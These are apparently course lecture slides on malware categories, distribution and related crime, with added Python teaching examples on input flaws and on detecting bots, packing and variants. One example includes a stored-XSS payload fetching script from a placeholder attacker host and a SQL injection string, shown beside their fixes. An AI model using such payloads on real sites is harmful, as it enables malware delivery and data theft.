Internet Vulnerabilities & Criminal Activities

1 Internet Vulnerabilities & Criminal Activities
Malware 10.1 4/12/10

2 Malware
Malicious software designed to gain access to information and/or resources without the knowledge or consent of the end user.
Also called crimeware.
No longer teenage kids messing around: now used by organized crime groups for profit.

3 Malware History
1981 - First Apple II virus in the wild
Fred Cohen coins the term "virus"
First PC virus
Morris Internet worm
First polymorphic virus
Virus Construction Set
Good Times virus hoax
First macro virus
Back Orifice tool released

4 Malware History cont.
1999 - Melissa virus / worm
Tribal Flood Network - DDoS tool
Code Red worm
Nimda worm
Slammer worm
SoBig & Sasser worms
Storm worm
Conficker worm

5 Malware Trends
Increasing complexity & sophistication
Acceleration of the rate at which innovative tools & techniques are released
Movement from viruses to worms to kernel-level exploitation

6 Malware can be:
"Proof of concept"
  Created to prove it can be done
  Not found outside of a laboratory environment
  If the code is available, it can be used by others
"In the wild"
  Found on computers in everyday use

7 Traditional Categories of Malware
Virus
Worm
Malicious Mobile Code
Backdoor
Trojan Horse
Rootkit
Combination Malware

8 Virus
Infects a host file
  Host file: an .exe or a word-processor (WP) document
Self-replicates
Requires human interaction to replicate (the infected file must be run or opened)
Examples: Michelangelo, Melissa

9 Worm
Spreads across a network
Does not require human interaction to spread
Self-replicating
Examples: Morris Worm, Code Red, Slammer

10 Malicious Mobile Code
Lightweight program downloaded from a remote source and executed locally
Minimal human interaction
Written in JavaScript, VBScript, ActiveX, or Java
Example: script delivered to the browser through cross-site scripting (XSS)

11 Backdoor
Bypasses normal security controls
Gives the attacker access to the user's system
Examples: Netcat (a legitimate tool commonly used as one), Back Orifice, SubSeven (Sub7)

12 Trojan Horse
Program that disguises its hidden malicious purpose
Appears to be a harmless game or screensaver
Used to deliver spyware & backdoors
Not self-replicating

13 Rootkit
Replaces or modifies programs that are part of the operating system, to hide the attacker's files, processes and connections
Two levels
  User-level: replaces system binaries (the tools an administrator uses to look for intruders)
  Kernel-level: modifies the kernel itself, so even clean binaries report false results
Examples: Universal Root Kit, Kernel Intrusion System

14 Combination Malware
Uses a combination of the techniques above to increase effectiveness
Examples: Lion, Bugbear.B

15 Malware Distribution
Attachments
  E-mail and instant messaging
Piggybacking
  Malware added to a legitimate program
  Adware, spyware
  EULA - End User License Agreement: adware and spyware may not be illegal if the EULA disclosed them
Internet Worms
  Exploit a security vulnerability
  Used to install backdoors

16 Malware Distribution cont.
Web Browser Exploit
  Malware added to a legitimate web site
  Cross-site scripting & SQL injection (both caused by unvalidated input to the web site, as discussed in the first class)
  Visitors to the web site may be infected
Hacking
  Too labor intensive for large crime operations
  May be used to compromise a DNS server
Affiliate Marketing
  Web site owner paid 8¢ to 50¢ per machine to install malware on a visitor's computer
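The two input flaws named on this slide, as an added example that is not part of the lecture: an in-memory SQLite comment table stands in for a legitimate site, one constructed comment carries a script tag that would pull attacker code into every visitor's browser (stored XSS), and one constructed author string makes a string-built query return every row (SQL injection). The vulnerable and fixed versions sit side by side; the table, users, payloads and the evil.example URL are all invented for the demonstration.

```python
"""Added example (not from the slides): how unvalidated input lets an attacker plant
malware-loading script in a legitimate site (stored cross-site scripting) and read data
it should not (SQL injection), with the fix beside each. Everything here is constructed."""
import html
import sqlite3

# Constructed attacker inputs (the script URL is a placeholder, not a real host).
XSS_PAYLOAD = "<script src=//evil.example/a.js></script>"   # every visitor's browser would fetch it
SQLI_PAYLOAD = "' OR '1'='1"                                  # makes the WHERE clause always true


def make_db() -> sqlite3.Connection:
    """Constructed comment table: two ordinary users and one stored attack."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?)",
                     [("alice", "first post"), ("bob", "private note"), ("mallory", XSS_PAYLOAD)])
    return conn


def comments_by_vulnerable(conn, author: str) -> list:
    """Vulnerable: the author string is pasted into the SQL text, so it can rewrite the query."""
    sql = f"SELECT body FROM comments WHERE author = '{author}'"
    return [row[0] for row in conn.execute(sql)]


def comments_by_fixed(conn, author: str) -> list:
    """Fixed: a parameterised query; the driver never lets data become SQL."""
    return [row[0] for row in conn.execute("SELECT body FROM comments WHERE author = ?", (author,))]


def render_vulnerable(bodies) -> str:
    """Vulnerable: comment text is dropped into the HTML as-is, so a stored <script> runs."""
    return "<ul>" + "".join(f"<li>{b}</li>" for b in bodies) + "</ul>"


def render_fixed(bodies) -> str:
    """Fixed: output encoding turns < > & and quotes into entities; the browser shows text."""
    return "<ul>" + "".join(f"<li>{html.escape(b)}</li>" for b in bodies) + "</ul>"


if __name__ == "__main__":
    conn = make_db()
    print("SQLi, vulnerable:", comments_by_vulnerable(conn, SQLI_PAYLOAD))   # leaks every row
    print("SQLi, fixed:     ", comments_by_fixed(conn, SQLI_PAYLOAD))        # nothing matches
    print("XSS, vulnerable: ", render_vulnerable(comments_by_fixed(conn, "mallory")))
    print("XSS, fixed:      ", render_fixed(comments_by_fixed(conn, "mallory")))
```

Note that the fix for each flaw lives at a different layer: parameters keep data out of the query, and output encoding keeps data out of the page's markup. Validating input on the way in helps, but neither fix depends on it.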

17 Malware Activity
What malware is used to do:
Adware
Spyware
Hijacker
Toolbars
Dialers
Rogue Security Software
Bots

18 Adware
Displays ads on the infected machine
Ad formats can be:
  Pop-ups
  Pop-unders
  Embedded in programs
  Overlaid on top of a web site's own ads
More annoying than dangerous
Not dependent on IE being open
Not stopped by pop-up blockers
May be related to the web sites surfed

19 Spyware
Sends information about the infected computer to someone, somewhere:
  Web sites surfed
  Terms searched for
  Information from web forms
  Files downloaded
  Files found by searching the hard drive
  Installed address book
  Browser history
  Logon names, passwords, credit card numbers
  Any other personal information (name, phone number, etc.)

20 Hijacker
Takes control of the web browser (IE particularly vulnerable)
  Home page
  Search engines
  Search bar
Redirects sites
Prevents some sites from loading

21 Toolbars
Plug-ins to IE
Attempt to emulate legitimate toolbars (Google, Yahoo)
Installed via underhanded means
Adware or spyware
May act as a keystroke logger

22 Dialers
Alter modem connections and ISDN cards
Once installed, dial premium-rate numbers
Run up the end user's phone bill & provide revenue for the criminal enterprise
Target MS Windows
Particularly effective in Europe

23 Rogue Security Software
Usually delivered via a trojan horse
Uses social engineering techniques to get the user to install it
  Fake warnings that the computer is infected
  Fake video of the machine crashing
Disables anti-virus and anti-spyware programs
Alters the computer system so the rogue software cannot be removed

24 Bots
Allow the attacker remote access to a computer
When the end user is online, the computer contacts a Command & Control (C&C) site
  C&C is often an IRC channel
The bot then performs whatever commands it receives from the C&C
Some things botnets are used for:
  Distributed Denial of Service (DDoS) attacks
  Spam
  Hosting contraband such as child porn
  Other illegal fraud schemes
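The check-in behaviour described above is detectable from the defender's side: a bot that polls its C&C on a timer leaves near-identical gaps between connections, which human browsing never does. The following beaconing detector is an added example, not material from the lecture; the host names, addresses, IRC port and timestamps in the log are constructed, and the thresholds (five contacts, coefficient of variation at most 0.1) are assumptions to tune per network.

```python
"""Added example (not from the slides): finding a bot's regular check-ins with its
command-and-control (C&C) site in a log of outbound connections."""
import statistics
from collections import defaultdict

# Constructed log: "<epoch seconds> <source host> <destination ip:port>".
# ws-17 polls an IRC port every ~300 s with a little jitter; ws-03 is an ordinary user.
LOG = """\
1000 ws-17 198.51.100.7:6667
1009 ws-03 203.0.113.9:443
1302 ws-17 198.51.100.7:6667
1340 ws-03 203.0.113.9:443
1598 ws-17 198.51.100.7:6667
1601 ws-03 203.0.113.9:443
1901 ws-17 198.51.100.7:6667
2203 ws-17 198.51.100.7:6667
2499 ws-17 198.51.100.7:6667
2900 ws-03 203.0.113.9:443
3050 ws-03 203.0.113.9:443
"""


def parse_connections(log: str) -> dict:
    """Group connection timestamps by (source, destination)."""
    events = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst = line.split()
        events[(src, dst)].append(int(ts))
    return events


def gap_regularity(timestamps) -> float:
    """Coefficient of variation of the gaps between contacts.
    0.0 is clockwork; human-driven traffic gives values near or above 1."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return statistics.pstdev(gaps) / mean if mean else float("inf")


def find_beacons(log: str, min_contacts: int = 5, max_cv: float = 0.1) -> list:
    """Return (src, dst, mean_gap_seconds) for pairs whose timing looks like C&C polling."""
    hits = []
    for (src, dst), ts in parse_connections(log).items():
        if len(ts) < min_contacts:          # too few samples to judge regularity
            continue
        if gap_regularity(ts) <= max_cv:
            ts = sorted(ts)
            mean_gap = (ts[-1] - ts[0]) / (len(ts) - 1)
            hits.append((src, dst, round(mean_gap)))
    return hits


if __name__ == "__main__":
    for src, dst, gap in find_beacons(LOG):
        print(f"{src} -> {dst}: contacts every ~{gap}s, looks like C&C polling")
```

A hit is a lead, not proof: software updaters, NTP clients and monitoring agents also beacon, so known-good destinations belong on an allowlist before the alert goes to an analyst.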

25 More Malware Terminology
Downloader
  Often a single line of code in the malware's payload
  Instructs the infected computer to download further malware from the attacker's server
Drop
  Clandestine computer or service
  Collects information sent to it from infected machines
  Blind drop - well hidden, designed to run unattended

26 More Malware Terminology cont.
Exploit
  Code used to take advantage of a vulnerability in software code or configuration
Form-grabber
  A program that steals information submitted by a user to a web site
  Captures the form data inside the browser, so it works even when the user is on the legitimate site (used in phishing without a fake site)
Packer
  Tool used to scramble and compress an .exe file
  Hides the malicious nature of the code
  Makes analysis of the program more difficult
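Because a packer leaves the real program compressed or encrypted inside the file, most of the file's bytes look random, and byte entropy is the standard first-pass heuristic for spotting that. The following is an added example, not from the lecture: a Shannon-entropy scorer and a chunk-based "looks packed" check run over two constructed stand-ins (a repetitive header-plus-text blob and a tiny stub followed by random bytes). Neither sample is a real executable, and the 1024-byte chunk size, 7.0 bits/byte threshold and 50% chunk fraction are assumed tuning values.

```python
"""Added example (not from the slides): a byte-entropy heuristic for spotting a packed
executable. Packing compresses or encrypts the real program, so most of the file looks like
random bytes; ordinary code and data do not. Both samples below are constructed stand-ins."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for one repeated value, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, size: int = 1024) -> list:
    """Entropy of each fixed-size slice; a packer stub is small, the packed body is large."""
    return [shannon_entropy(data[i:i + size]) for i in range(0, len(data), size)]


def looks_packed(data: bytes, threshold: float = 7.0, min_fraction: float = 0.5) -> bool:
    """Flag the file if at least min_fraction of its chunks are near-random (>= threshold)."""
    ents = chunk_entropies(data)
    high = sum(1 for e in ents if e >= threshold)
    return bool(ents) and high / len(ents) >= min_fraction


# Constructed "unpacked" sample: a header plus repetitive text, as code and strings tend to be.
PLAIN = (b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n") * 80

# Constructed "packed" sample: a tiny loader stub followed by a body that is indistinguishable
# from random, which is what compressed or encrypted code looks like. Seeded for repeatability.
_rng = random.Random(7)
PACKED = b"STUB" + bytes(_rng.getrandbits(8) for _ in range(8192))


if __name__ == "__main__":
    for name, blob in (("plain", PLAIN), ("packed", PACKED)):
        print(f"{name}: {shannon_entropy(blob):.2f} bits/byte, packed={looks_packed(blob)}")
```

Entropy alone cannot tell a packed program from an archive or a JPEG, which are also near-random, so in practice the score is read alongside the section names, the size of the import table and the entry point's location before a file is called packed.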

27 More Malware Terminology cont.
Redirect
  HTTP feature used to forward someone from one web page to another
  Done invisibly by malware
Variant
  Malware produced from the same code base
  Different enough to require a new signature for detection by anti-virus software
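Why a variant needs a new signature depends on what kind of signature is in use, and the following added example (not from the lecture) shows the difference. An exact hash of a known sample fails on any change at all; a byte-pattern signature with wildcards survives a variant that only changes an address and its strings; a reworked build that alters the matched instructions evades both. The byte strings are constructed stand-ins for a function prologue (push, mov, push-address, call), not real malware, and the signature syntax with `??` wildcards is a simple one written for this example.

```python
"""Added example (not from the slides): why a variant defeats a hash-based check but not a
byte-pattern signature with wildcards, and why a bigger change defeats both."""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compile_signature(pattern: str) -> re.Pattern:
    """Turn 'A1 B2 ?? C3' into a compiled byte regex; '??' matches any one byte."""
    parts = [b"." if tok == "??" else re.escape(bytes([int(tok, 16)])) for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def matches(sig: re.Pattern, data: bytes) -> bool:
    return sig.search(data) is not None


# Constructed samples. The first bytes stand in for a function prologue that pushes an
# address and calls a routine; the variant changes only that address and its own strings.
ORIGINAL = bytes.fromhex("55 8b ec 68 00 20 40 00 e8 10 00 00 00") + b"build-1 payload"
VARIANT = bytes.fromhex("55 8b ec 68 40 30 40 00 e8 10 00 00 00") + b"build-2 payload"
# A reworked build that loads the address with mov instead of push no longer fits the pattern.
REWORKED = bytes.fromhex("90 55 8b ec b8 00 20 40 00 e8 10 00 00 00") + b"build-3 payload"

# Signature written against ORIGINAL with the four address bytes wildcarded.
SIG = compile_signature("55 8B EC 68 ?? ?? ?? ?? E8")


def classify(sample: bytes, known_hashes: set, sig: re.Pattern) -> str:
    """Mimic an anti-virus decision: exact hash first, then the pattern signature."""
    if sha256_hex(sample) in known_hashes:
        return "known-hash"
    if matches(sig, sample):
        return "signature"
    return "undetected"


if __name__ == "__main__":
    known = {sha256_hex(ORIGINAL)}
    for name, sample in (("original", ORIGINAL), ("variant", VARIANT), ("reworked", REWORKED)):
        print(f"{name}: {classify(sample, known, SIG)}")
```

This is the trade-off behind signature writing: the more bytes a signature wildcards, the more variants it catches and the more legitimate programs sharing a common prologue it risks matching, which is why real signatures anchor on code that is distinctive to the family rather than on a generic function entry.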

28 Malware Sources
Where do criminals get malware?
Malware
  Can be programmed from scratch
    Less likely to be detected by anti-malware programs
  Can be purchased
Malware tools
  Haxdoor, Torpig, Metafisher, Web Attacker
  Tools offered with other services: access to a botnet, drop sites
  Tools derived from a small, stable base of existing code

29 Frauds Involving Malware
Advertising schemes (take advantage of legitimate ad plans on the web)
  Pay-per-view
  Pay-per-click ("Click Fraud")
  Pay-per-install
Banking fraud
Identity theft
Spam
Denial-of-service attacks
  DoS extortion

30 Advertising Schemes
Pay-per-view
  Sell advertising space on controlled web sites
  Command the botnet to "view" as many ads as possible
  May have ads download in the background
  Fraudulent commissions generated

31 Advertising Schemes cont.
Pay-per-click ("Click Fraud")
  Similar to pay-per-view fraud
  Bots simulate clicks on ads
  Between 5% and 35% of all ad commissions may be fraudulent
Pay-per-install
  Commission paid every time the advertiser's software is installed
  When installed, notification is sent to the advertiser
  Infected machines are instructed to install the advertiser's software
  Software: browser plug-ins, adware, spyware

32 Banking Fraud
Banks are a prime target of malware
Malware can allow an attacker to empty the victim's bank account
Newest malware (September 2009) rewrites online bank statements on the fly
  Covers up the theft of funds, so the crooks gain time
  A trojan horse alters the HTML before the browser displays it (a "man-in-the-browser" attack)
Makes use of "money mules"
  Unaware of the criminal nature of the activity
  Allow their bank accounts to be used
  Social engineering: the mule buys into a work-at-home scheme

33 Identity Theft
Phishing & key logging
Recent increase in malware associated with identity theft
Information sent to a drop site

34 Spam
Bots used to send spam
Also shows a dramatic rise
Bots are available for rent for spam purposes
Spam sent can also contain malware

35 Denial of Service Attacks
Botnet commanded to make requests of a web site
Web site may crash due to heavy traffic
Legitimate traffic blocked
Threat of a DoS attack can be used for extortion
  Threats often made to sites with no legal recourse, such as offshore gambling sites
Bots for rent for DoS attacks
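Both bot-driven frauds the lecture describes, click fraud (slide 31) and the botnet flood (slide 35), show up in a web server's access log as request rates no person produces, and the following added example (not from the lecture) runs two rate checks over such a log. One address clicking an ad 40 times in 40 seconds trips a per-source limit; a flood spread over 60 addresses, each making only three requests, does not, so the second check looks at aggregate load per window together with how many distinct sources produced it. The log is generated inside the block and is entirely constructed, the Common-Log-Format layout is simplified to epoch-second timestamps, and every threshold is an assumed value to be tuned against real traffic.

```python
"""Added example (not from the slides): rate-based detection of bot traffic in a web server
access log, covering a single-address click-fraud bot and a distributed flood."""
import re
from collections import Counter, defaultdict

# Simplified Common Log Format with an epoch-second timestamp in the brackets.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>\d+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+$'
)


def make_log() -> str:
    """Constructed traffic: five readers, one click-fraud bot, one 60-host flood."""
    lines = []
    for i in range(5):                      # ordinary readers: a page roughly every 30 s
        for k in range(6):
            lines.append(f'10.0.0.{i + 1} - - [{i * 7 + k * 30}] "GET /article/{k} HTTP/1.1" 200 512')
    for k in range(40):                     # click-fraud bot: 40 ad clicks in 40 s from one address
        lines.append(f'198.51.100.23 - - [{200 + k}] "GET /click?ad=7 HTTP/1.1" 302 0')
    for n in range(1, 61):                  # DDoS: 60 bot addresses, 3 front-page hits each in 5 s
        for k in range(3):
            lines.append(f'203.0.113.{n} - - [{400 + 2 * k}] "GET / HTTP/1.1" 200 2048')
    return "\n".join(lines)


def parse(log: str):
    """Yield one dict per well-formed line; malformed lines are skipped, not fatal."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            event = m.groupdict()
            event["ts"] = int(event["ts"])
            yield event


def flag_click_bots(events, path_prefix="/click", window=60, max_per_window=10) -> list:
    """Addresses that hit the ad-click path faster than a person could in any window."""
    counts = Counter()
    for e in events:
        if e["path"].startswith(path_prefix):
            counts[(e["ip"], e["ts"] // window)] += 1
    return sorted({ip for (ip, _), n in counts.items() if n > max_per_window})


def flag_flood_windows(events, window=10, max_total=50, min_sources=20) -> list:
    """Windows whose aggregate load is far above normal AND spread across many addresses:
    the shape of a botnet flood, where each bot alone stays under any per-address limit."""
    totals, sources = Counter(), defaultdict(set)
    for e in events:
        w = e["ts"] // window
        totals[w] += 1
        sources[w].add(e["ip"])
    return sorted(w for w in totals if totals[w] > max_total and len(sources[w]) >= min_sources)


if __name__ == "__main__":
    events = list(parse(make_log()))
    print("click-fraud sources:", flag_click_bots(events))
    print("flood windows (start second):", [w * 10 for w in flag_flood_windows(events)])
```

The per-source check is what an ad network runs before paying a commission; the aggregate check is what an operator needs to decide when to start rate-limiting or shedding load, since blocking individual bot addresses one at a time does nothing against a flood of this shape.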

36 Problems for Law Enforcement
Anonymity
Jurisdiction
  Attackers know how difficult international law enforcement is and exploit the situation
  Target victims in one country from another country
  Have the C&C site and drop site located in a third country
  Use multiple proxies to access the C&C site and drop site
  Money gained is quickly funneled through online bank accounts and international money transfers

37 Other Issues
Monetary threshold
  Must reach a limit before a prosecutor will take the case
  May be hard to prove the exact amount of money involved
  Cyber crimes may be considered a non-priority
Virtual world emboldens individuals
  Less fear of getting caught
  Realization of the difficulties in investigating these crimes

